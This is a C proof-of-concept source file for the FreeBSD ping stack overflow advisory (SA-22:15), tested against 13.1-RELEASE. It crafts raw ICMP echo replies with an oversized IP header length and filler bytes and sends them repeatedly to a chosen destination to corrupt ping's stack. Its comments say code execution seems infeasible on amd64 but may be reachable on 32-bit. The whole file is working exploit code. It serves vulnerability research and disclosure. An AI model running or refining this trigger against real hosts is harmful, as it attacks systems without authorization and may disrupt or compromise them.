/*
 * FreeBSD-SA-22:15 PoC, by Claes M Nyberg <cmn@signedness.org>, 2022-12-01
 * Tested against FreeBSD 13.1-RELEASE amd64
 * pong.c
 * cc -o pong -pedantic -Wall pong.c
 *
 * The bug does not seem to be sploitable on amd64, we can overwrite half 
 * (four bytes) of the canary, but filling the extra 40 bytes of IP "options" 
 * with arbitrary data is not possible since the kernel will drop the packet
 * in most cases. However, on 32bit we might be able to reach the return 
 * address but still have to conquer the canary in some way.
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/time.h>
#include <string.h>
#include <unistd.h>
#include <time.h>

#ifndef FIXIPLEN
#define SETIPLENFIX(x)      x
#define GETIPLENFIX(x)      x
#else
#define SETIPLENFIX(x)   htons(x)
#define GETIPLENFIX(x)   ntohs(x)
#endif /* FIXIPLEN */

#define IP_PROTO_TCP       0x06
#define IP_PROTO_UDP       0x11
#define IP_PROTO_ICMP      0x1

/*
 * Internet Protocol version 4 header
 */
typedef struct {
#ifdef WORDS_BIGENDIAN
    uint8_t ip_ver :4,  /* IP version */
    ip_hlen: 4;        /* Header length in (4 byte) words */
#else
    uint32_t ip_hlen :4, /* Header length in (4 byte) words */
    ip_ver: 4;         /* IP version */
#endif
    uint8_t ip_tos;      /* Type of service */
    uint16_t ip_tlen;    /* Datagram total length */
    uint16_t ip_id;      /* Identification number */
#ifdef WORDS_BIGENDIAN
    uint16_t ip_flgs: 3, /* Fragmentation flags */
    ip_off: 13;         /* Fragment offset */
#else
    uint32_t ip_off: 13, /* Fragment offset */
    ip_flgs: 3;         /* Fragmentation flags */
#endif
    uint8_t ip_ttl;      /* Time to live */
    uint8_t ip_prot;     /* Transport layer protocol (ICMP=1, TCP=6, UDP=17) */
    uint16_t ip_sum;     /* Checksum */
    uint32_t ip_sadd;      /* Source address */
    uint32_t ip_dadd;      /* Destination address */
} __attribute__((packed)) IPv4_hdr;


/*
 * Internet Control Message Protocol Header
 * See W. Richard Stevens TCP/IP illustrated Vol 1 page 69->85.
 */
typedef struct {
    uint8_t icmp_type;
    uint8_t icmp_code;
    uint16_t icmp_sum;
    union {
        struct {
            uint16_t id;
            uint16_t seq;
        } icmp_echo;
        uint32_t gw;    /* gateway if type is 5 */
    } icmp_u32;
} __attribute__((packed)) ICMP_hdr;


/*
 * Generates header checksum.
 * W. Richard Stevens TCP/IP illustrated vol. 1 page 145
 */
unsigned short
chksum(uint16_t *buf, int nwords)
{
	unsigned long sum = 0;

	for(; nwords > 0; nwords--)
		sum += *buf++;

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	return(~sum);
}

/*
 * Open raw socket
 * Returns a socket descriptor on success, -1 on error.
 */
int
rawpkt_open(void)
{
    int fd;
    const int one = 1;

    if ( (fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        fprintf(stderr, "** Error: Failed to open raw socket: %s\n",
            strerror(errno));
        return(-1);
    }

    if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL,
            (void *)&one, (socklen_t)sizeof(one)) < 0) {
        fprintf(stderr, "** Error: Cannot set header included: %s\n",
            strerror(errno));
		close(fd);
        return(-1);
    }

    if (setsockopt(fd, SOL_SOCKET, SO_BROADCAST,
            (void *)&one, (socklen_t)sizeof(one)) < 0) {
        fprintf(stderr, "** Error: Cannot set broadcast address on socket: %s\n",
            strerror(errno));
		close(fd);
        return(-1);
    }

    return(fd);
}


/*
 * Translate hostname or dotted decimal host address
 * into a network byte ordered IP address.
 * Returns -1 on error.
 */
long
net_inetaddr(const char *host)
{
    long haddr;
    struct hostent *hent;

    if ( (haddr = inet_addr(host)) < 0) {
        if ( (hent = gethostbyname(host)) == NULL)
            return(-1);

        memcpy(&haddr, (hent->h_addr), 4);
    }
    return(haddr);
}


/*
 * Send the packet.
 * Returns zero on success and -1 on error.
 */
int
rawpkt_send_packet(int raw_sock, uint8_t *packet)
{
	struct sockaddr_in sin;

	/* Create IPv4 address */
	memset(&sin, 0x00, sizeof(struct sockaddr_in));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = ((IPv4_hdr *)packet)->ip_dadd;

#if 0
	/* Set destination port */
	if (((IPv4_hdr *)packet)->ip_prot == IP_PROTO_TCP)
		sin.sin_port = ((TCP_hdr *)(packet + sizeof(IPv4_hdr)))->tcp_dprt;
	else if (((IPv4_hdr *)packet)->ip_prot == IP_PROTO_UDP)
		sin.sin_port = ((UDP_hdr *)(packet + sizeof(IPv4_hdr)))->udp_dprt;
#endif

	/* Send packet */
	if (sendto(raw_sock, (char *)packet, 
			GETIPLENFIX(((IPv4_hdr *)packet)->ip_tlen) - 24, 0, 
			(struct sockaddr *)&sin, sizeof(sin)) < 0) {

		fprintf(stderr, "** Error: sendto(%d, %p, %d, 0, "
				"%p, %lu): %s\n", raw_sock, packet, 
				GETIPLENFIX(((IPv4_hdr *)packet)->ip_tlen), 
				(void *)&sin, sizeof(sin), strerror(errno));

		return(-1);
	}
	
	return(0);
}


int
build_icmp_echo_reply(uint8_t *buf, size_t buflen, 
	uint32_t srcip, uint32_t dstip, uint16_t id, uint16_t seq, 
	uint8_t *payload, size_t paylen)
{
	IPv4_hdr *iph;
	ICMP_hdr *ich;

	/* Zero out buffer */
	memset(buf, 0x00, buflen);

	/* IPv4 */
	iph = (IPv4_hdr *)buf;
	iph->ip_ver = 4;
	iph->ip_hlen = 15;
	iph->ip_tos = 0x00;
	iph->ip_id = 0x1337;
	iph->ip_flgs = 0x0;	/* (Don't) fragment */
	iph->ip_off = 0x00; /* Fragment offset */
	iph->ip_ttl = 254;
	iph->ip_tlen = SETIPLENFIX( (iph->ip_hlen * 4)  + sizeof(ICMP_hdr) + paylen);
	iph->ip_prot = IP_PROTO_ICMP;
	iph->ip_sadd = srcip;
	iph->ip_dadd = dstip;

	/* Set IP "options" */
	//memset(buf + sizeof(IPv4_hdr), 0x41, 20);

	/* ICMP */
	ich = (ICMP_hdr *)(buf + iph->ip_hlen * 4);
	ich->icmp_type = 0;
	ich->icmp_code = 0;
	ich->icmp_sum = 0;
	ich->icmp_u32.icmp_echo.id = htons(id);
	ich->icmp_u32.icmp_echo.seq = htons(seq);

	/* Copy payload */
	memcpy(&buf[(iph->ip_hlen * 4)+sizeof(ICMP_hdr)], payload, paylen);

	/* Set ICMP checksum */
	ich->icmp_sum = chksum((unsigned short *)ich, 
		(sizeof(ICMP_hdr) + (paylen-24) + (paylen % 2)) >> 1);

	/* Set IP checksum */
	iph->ip_sum = chksum((unsigned short *)buf, 
		(GETIPLENFIX(iph->ip_tlen) +  (paylen % 2))>> 1);

	return 0;
}

int
main(int argc, char **argv)
{
	uint32_t sip;
	uint32_t dip;
	uint16_t id;
	uint16_t seq;
	int fd;

	if (argc != 5) {
		printf("Usage: %s <src-ip> <dst-ip> <id> <start-seq>\n", argv[0]);
		exit(EXIT_FAILURE);
	}

	if ( (long)(sip = net_inetaddr(argv[1])) == -1) {
		fprintf(stderr, "** Error: Failed to resolve source IP\n");
		exit(EXIT_FAILURE);
	}

	if ( (long)(dip = net_inetaddr(argv[2])) == -1) {
		fprintf(stderr, "** Error: Failed to resolve destination IP\n");
		exit(EXIT_FAILURE);
	}

	id = strtoul(argv[3], NULL, 0);
	seq = strtoul(argv[4], NULL, 0);

	if ( (fd = rawpkt_open()) == -1)
		exit(EXIT_FAILURE);

	while (1) {
		uint8_t buf[1200];
		uint8_t payload[64];
		int len;

		memset(payload, 0x41, sizeof(payload));
		len = build_icmp_echo_reply(buf, sizeof(buf), sip, dip, id, seq, 
			payload, sizeof(payload));
		if (len < 0)
			exit(EXIT_FAILURE);

		printf("Sending ICMP echo reply %s -> %s [id=%u icmp_seq=%u]\n", 
			argv[1], argv[2], id, seq);
		rawpkt_send_packet(fd, buf);

		sleep(1);
		seq++;
	}

}
